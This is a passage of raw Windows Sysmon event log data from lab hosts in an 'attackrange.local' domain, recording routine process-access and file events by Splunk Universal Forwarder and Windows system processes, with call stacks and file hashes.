Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4840AB55D15F2E1F2388494E55EC4B1,SHA256=AA9C05162C551345BD74A6A7D2DF91B8D38EE4D8CB419E1618D6F604ACC7478F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807032Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.763{0C1E0330-F405-60EB-6079-00000000D001}3881476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807031Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F405-60EB-6079-00000000D001}388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807030Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807029Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807028Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807027Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807026Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807025Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807024Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807023Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807022Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F405-60EB-6079-00000000D001}388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807021Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807020Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F405-60EB-6079-00000000D001}388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807019Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.623{0C1E0330-F405-60EB-6079-00000000D001}388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807018Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.388{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8D6C090940751E8CC4AD3A0BFA65E00C,SHA256=2195244BD23F51881258F5E7995E17E6BBE8A8ADD2D24679CE5DB6BB8C6BE0EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807017Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.388{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2ED9EEB5EA99F0F0253011651D9FAA42,SHA256=2A37F9C1FB0401BD6ACCE0B88B89043061F1F2860621FC11000EBA0DB1981C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807016Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.388{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94097294352F5F82B323EA6DB064AF0D,SHA256=F15F37255D1377D085D2F974226604D808626C828E6D5DA9587FA6669B7D51C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:25.077{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CBE1EE1CD4DC60029393FB25F9FAE53,SHA256=93904EA23221318BDF24E107F749BE6F46364A3031396C86A20898348491D9D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807047Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.622{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8D6C090940751E8CC4AD3A0BFA65E00C,SHA256=2195244BD23F51881258F5E7995E17E6BBE8A8ADD2D24679CE5DB6BB8C6BE0EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807046Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.513{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8CDE4E34D435ED5696986BE524E8591,SHA256=5C44173FBEF42C98A769E7BAC7A5CC803A5F2BCF38C0BFDD58B6D736D452D728,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:26.110{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D82C44696431A81D451EA42E033286C8,SHA256=91338715517774137763B423D5EEF366D745CE89E47DAA04680CCE8A923E0F5A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807045Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F406-60EB-6179-00000000D001}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807044Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807043Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807042Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807041Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807040Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807039Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807038Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807037Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 